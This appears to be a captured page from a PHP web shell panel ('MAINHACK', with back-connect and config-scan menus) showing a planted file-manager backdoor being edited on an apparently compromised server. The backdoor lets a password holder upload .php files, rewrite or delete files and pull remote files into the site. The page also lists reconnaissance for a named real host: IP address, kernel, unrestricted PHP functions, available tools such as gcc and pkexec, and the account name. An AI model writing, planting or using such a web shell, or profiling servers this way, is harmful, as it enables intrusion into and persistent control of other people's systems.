[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: index.php
rrt<?php session_start(); error_reporting(E_ALL); ini_set('display_errors', 1); define('BASE_DIR', realpath(__DIR__)); define('PASSWORD_HASH', '$2y$10$MZ7AM4wo2K5zUcKc6bQkt.UoSC5wsF420XUTSRkzeVn3mUMGE6Qgq'); // bcrypt hashed password define('MAX_UPLOAD_SIZE', 10 * 1024 * 1024); define('ALLOWED_EXTS', ['php', 'jpg', 'png', 'zip', 'pdf', 'doc', 'docx']); define('ALLOW_REMOTE', true); // CSRF token generation function function getCsrfToken() { if (empty($_SESSION['csrf_token'])) { $_SESSION['csrf_token'] = bin2hex(random_bytes(32)); } return $_SESSION['csrf_token']; } // Enforce login if (!isset($_SESSION['authenticated'])) { if ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST['password']) && isset($_POST['csrf_token']) && hash_equals(getCsrfToken(), $_POST['csrf_token'])) { if (password_verify($_POST['password'], PASSWORD_HASH)) { $_SESSION['authenticated'] = true; header("Location: " . $_SERVER['PHP_SELF']); exit; } else { $login_error = 'Invalid password'; } } // Show simple login form and exit echo '<!DOCTYPE html><html><head><title>Login</title></head><body>'; echo '<form method="post">'; echo '<input type="hidden" name="csrf_token" value="' . htmlspecialchars(getCsrfToken()) . '">'; echo '<input type="password" name="password" placeholder="Password" required autofocus>'; echo '<button type="submit">Login</button>'; if (!empty($login_error)) { echo '<p style="color:red;">' . htmlspecialchars($login_error) . '</p>'; } echo '</form></body></html>'; exit; } // Sanitize input filenames/folders function sanitize($input) { return preg_replace('/[^a-zA-Z0-9._-]/', '', $input); } // Resolve workspace directory safely inside BASE_DIR function resolvePath($relPath) { $path = realpath(BASE_DIR . '/' . $relPath); if (!$path || strpos($path, BASE_DIR) !== 0) { return BASE_DIR; } return $path; } // Recursive remove directory function function recursiveDelete($dir) { if (is_file($dir)) { return unlink($dir); } if (!is_dir($dir)) { return false; } foreach (scandir($dir) as $item) { if ($item === '.' || $item === '..') continue; if (!recursiveDelete($dir . '/' . $item)) { return false; } } return rmdir($dir); } $message = null; if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['csrf_token']) && hash_equals($_SESSION['csrf_token'], $_POST['csrf_token'])) { $workspace = resolvePath($_POST['workspace'] ?? ''); if (isset($_POST['create_folder'])) { $folderName = sanitize($_POST['folder_name'] ?? ''); if ($folderName && !is_dir("$workspace/$folderName")) { if (mkdir("$workspace/$folderName", 0755)) { $message = "Folder '$folderName' created successfully."; } else { $message = "Failed to create folder."; } } else { $message = "Folder already exists or invalid name."; } } if (isset($_FILES['file_upload']) && $_FILES['file_upload']['error'] === UPLOAD_ERR_OK) { $file = $_FILES['file_upload']; $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION)); $safeName = sanitize($file['name']); if (in_array($ext, ALLOWED_EXTS) && $file['size'] <= MAX_UPLOAD_SIZE && !file_exists("$workspace/$safeName")) { if (move_uploaded_file($file['tmp_name'], "$workspace/$safeName")) { $message = "File uploaded: $safeName"; } else { $message = "Failed to move uploaded file."; } } else { $message = "Invalid file or file already exists."; } } if (isset($_POST['delete_item'])) { $item = sanitize($_POST['delete_item']); $path = "$workspace/$item"; if (file_exists($path)) { if (is_dir($path)) { $result = recursiveDelete($path); $message = $result ? "Folder deleted: $item" : "Failed to delete folder."; } else { $result = unlink($path); $message = $result ? "File deleted: $item" : "Failed to delete file."; } } else { $message = "Item not found."; } } if (isset($_POST['edit_file'])) { $fileName = sanitize($_POST['file_name'] ?? ''); $content = $_POST['content'] ?? ''; $fullPath = "$workspace/$fileName"; if (is_file($fullPath) && is_writable($fullPath)) { if (file_put_contents($fullPath, $content) !== false) { $message = "File updated: $fileName"; } else { $message = "Failed to update file."; } } else { $message = "File not found or not writable."; } } if (ALLOW_REMOTE && isset($_POST['fetch_remote'])) { $url = filter_var($_POST['remote_url'] ?? '', FILTER_VALIDATE_URL); if ($url) { $fileName = sanitize(basename(parse_url($url, PHP_URL_PATH))); $ext = strtolower(pathinfo($fileName, PATHINFO_EXTENSION)); $destination = "$workspace/$fileName"; if (in_array($ext, ALLOWED_EXTS) && !file_exists($destination)) { $data = @file_get_contents($url); if ($data !== false) { if (file_put_contents($destination, $data) !== false) { $message = "Remote file downloaded: $fileName"; } else { $message = "Failed to save remote file."; } } else { $message = "Failed to download remote file."; } } else { $message = "Invalid file extension or file exists."; } } else { $message = "Invalid URL provided."; } } } $currentWorkspace = resolvePath($_GET['workspace'] ?? ''); $relativeWorkspace = trim(str_replace(BASE_DIR, '', $currentWorkspace), '/'); $items = scandir($currentWorkspace); $folders = $files = []; foreach ($items as $item) { if ($item === '.' || $item === '..') continue; if (is_dir("$currentWorkspace/$item")) { $folders[] = $item; } else { $files[] = $item; } } function formatSize($bytes) { $units = ['B', 'KB', 'MB', 'GB', 'TB']; $i = 0; while ($bytes >= 1024 && $i < count($units) - 1) { $bytes /= 1024; $i++; } return round($bytes, 2) . " " . $units[$i]; } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Simple PHP File Manager</title> <style> body { font-family: Arial,sans-serif; margin: 20px; background:#f0f0f0; } h1 { margin-bottom: 20px; } .message { padding: 10px; background: #dff0d8; border: 1px solid #d0e9c6; margin-bottom: 15px; } table { border-collapse: collapse; width: 100%; background: white; } th, td { border: 1px solid #ccc; padding: 8px; text-align: left; } a { text-decoration: none; color: blue; } a:hover { text-decoration: underline; } form.inline { display: inline; } </style> </head> <body> <h1>File Manager</h1> rrt<?php if (!empty($message)): ?> <div class="message"><?=htmlspecialchars($message)?></div> rrt<?php endif; ?> <p>Current Directory: /<?= htmlspecialchars($relativeWorkspace ?: 'root') ?></p> <p><a href="?workspace=<?= urlencode(dirname($relativeWorkspace ?: '.')) ?>">Go Up</a></p> <h2>Folders</h2> <ul> rrt<?php foreach ($folders as $folder): ?> <li> <a href="?workspace=<?= urlencode(($relativeWorkspace ? $relativeWorkspace . '/' : '') . $folder) ?>"><?=htmlspecialchars($folder)?></a> <form method="post" class="inline" onsubmit="return confirm('Delete folder <?=htmlspecialchars($folder)?>?');"> <input type="hidden" name="csrf_token" value="<?=htmlspecialchars(getCsrfToken())?>"> <input type="hidden" name="workspace" value="<?=htmlspecialchars($relativeWorkspace)?>"> <input type="hidden" name="delete_item" value="<?=htmlspecialchars($folder)?>"> <button type="submit">Delete</button> </form> </li> rrt<?php endforeach; ?> </ul> <h2>Files</h2> <table> <thead><tr><th>Name</th><th>Size</th><th>Actions</th></tr></thead> <tbody> rrt<?php foreach ($files as $file): ?> <tr> <td><?=htmlspecialchars($file)?></td> <td><?=formatSize(filesize("$currentWorkspace/$file"))?></td> <td> <form method="post" class="inline" onsubmit="return confirm('Delete file <?=htmlspecialchars($file)?>?');"> <input type="hidden" name="csrf_token" value="<?=htmlspecialchars(getCsrfToken())?>"> <input type="hidden" name="workspace" value="<?=htmlspecialchars($relativeWorkspace)?>"> <input type="hidden" name="delete_item" value="<?=htmlspecialchars($file)?>"> <button type="submit">Delete</button> </form> <a href="?workspace=<?=urlencode($relativeWorkspace)?>&edit=<?=urlencode($file)?>">Edit</a> </td> </tr> rrt<?php endforeach; ?> </tbody> </table> <h2>Create Folder</h2> <form method="post"> <input type="hidden" name="csrf_token" value="<?=htmlspecialchars(getCsrfToken())?>"> <input type="hidden" name="workspace" value="<?=htmlspecialchars($relativeWorkspace)?>"> <input type="text" name="folder_name" required placeholder="Folder name"> <button type="submit" name="create_folder">Create</button> </form> <h2>Upload File</h2> <form method="post" enctype="multipart/form-data"> <input type="hidden" name="csrf_token" value="<?=htmlspecialchars(getCsrfToken())?>"> <input type="hidden" name="workspace" value="<?=htmlspecialchars($relativeWorkspace)?>"> <input type="file" name="file_upload" required> <button type="submit">Upload</button> </form> rrt<?php if (ALLOW_REMOTE): ?> <h2>Download Remote File</h2> <form method="post"> <input type="hidden" name="csrf_token" value="<?=htmlspecialchars(getCsrfToken())?>"> <input type="hidden" name="workspace" value="<?=htmlspecialchars($relativeWorkspace)?>"> <input type="url" name="remote_url" required placeholder="https://example.com/file.zip"> <button type="submit" name="fetch_remote">Download</button> </form> rrt<?php endif; ?> rrt<?php if (!empty($_GET['edit'])): $editFile = sanitize($_GET['edit']); $editPath = $currentWorkspace . '/' . $editFile; if (is_file($editPath) && is_readable($editPath)): $content = htmlspecialchars(file_get_contents($editPath)); ?> <h2>Edit File: <?=htmlspecialchars($editFile)?></h2> <form method="post"> <input type="hidden" name="csrf_token" value="<?=htmlspecialchars(getCsrfToken())?>"> <input type="hidden" name="workspace" value="<?=htmlspecialchars($relativeWorkspace)?>"> <input type="hidden" name="file_name" value="<?=htmlspecialchars($editFile)?>"> <textarea name="content" rows="15" style="width:100%;"><?= $content ?></textarea><br> <button type="submit" name="edit_file">Save</button> </form> rrt<?php else: ?> <p>File not found or not readable.</p> rrt<?php endif; endif; ?> </body> </html>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.76 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002